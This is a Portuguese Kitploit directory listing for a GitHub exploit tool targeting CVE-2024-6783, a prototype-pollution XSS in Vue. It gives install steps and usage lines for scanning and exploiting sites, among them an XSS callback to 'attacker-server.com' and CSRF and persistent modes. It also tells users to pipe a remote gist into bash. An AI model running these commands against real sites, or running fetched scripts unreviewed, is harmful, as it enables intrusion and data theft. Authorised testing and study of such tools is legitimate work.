Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Ferramentas/GitHubGitHub/horkimhab/cve-2024-6783
Análise de VulnerabilidadesCTFAprendizado e EducaçãoRecursos CuradosTrilhas e CursosLabs e Prática
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Ver Repositório
3há 1 mêsAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-6783 - Vue CVE

Foi descoberta uma vulnerabilidade no Vue que permite a um atacante realizar XSS via poluição de protótipo. O atacante pode alterar a cadeia de protótipos de algumas propriedades, como Object.prototype.staticClass ou Object.prototype.staticStyle, para executar código JavaScript arbitrário.

Doar

Apoie a manutenção deste projeto com PayPal ou escaneando o código QR abaixo.

paypal

Código QR para doação

⚡ Uso Simples

Use este projeto apenas em ambientes seguros e autorizados, tais como:

  • Máquinas virtuais locais
  • Contêineres Docker
  • Configurações de laboratório isoladas
  • Ambientes autorizados de teste de penetração

Exemplo de configuração:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# O projeto usa python conforme abaixo

# Criar um ambiente virtual
python -m venv venv

# Ativar o ambiente virtual

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Instalar os requisitos
pip install -r requirements.txt

Baixar ferramenta

Exemplo de uso:

root@kitploit:~
# apenas escanear 
python cve-2024-6783.py -u https://example.com -v

# Escanear e explorar XSS 
python cve-2024-6783.py -u https://example.com -e xss

# Exploração de XSS com Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Servidor de Callback Automático
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# Exploração de CSRF
python cve-2024-6783.py -u https://example.com -e csrf

# Escaneamento Completo e Exploração com Saída Detalhada
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Nota:

  • ao clonar de outro projeto, você deve executar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpar o diretório .git aninhado
  • ex.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito ou Referência

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 Repositório Educacional de Pesquisa em Segurança

Um repositório para aprender, testar e pesquisar conceitos de cibersegurança em ambientes controlados.


⚠️ Aviso de Segurança e Legal

Finalidade

Este repositório destina-se exclusivamente à pesquisa educacional e de segurança autorizada.

Ele foi projetado para ajudar os usuários a aprender sobre:

  • Vulnerabilidades de segurança
  • Conceitos de sandbox e isolamento
  • Codificação segura e práticas defensivas

Uso Autorizado Apenas

Use este repositório somente em ambientes onde você tenha permissão, tais como:

  • Laboratórios pessoais ou máquinas virtuais
  • Ambientes Docker ou isolados
  • Testes de penetração autorizados
  • Treinamento em cibersegurança ou pesquisa acadêmica

O uso não autorizado ou ilegal é estritamente proibido.


Sem Responsabilidade

O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causados por este projeto.

Ao usar este repositório, você concorda que:

  • Você é responsável por suas próprias ações
  • Você o usará de forma legal e ética
  • O projeto é fornecido sem garantia

Uso Ético

Este projeto destina-se a:

  • Pesquisa de segurança defensiva
  • Educação em cibersegurança
  • Conscientização sobre vulnerabilidades
  • Pesquisa de sistemas e softwares seguros

Por favor, siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.


Contato

Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório através do GitHub.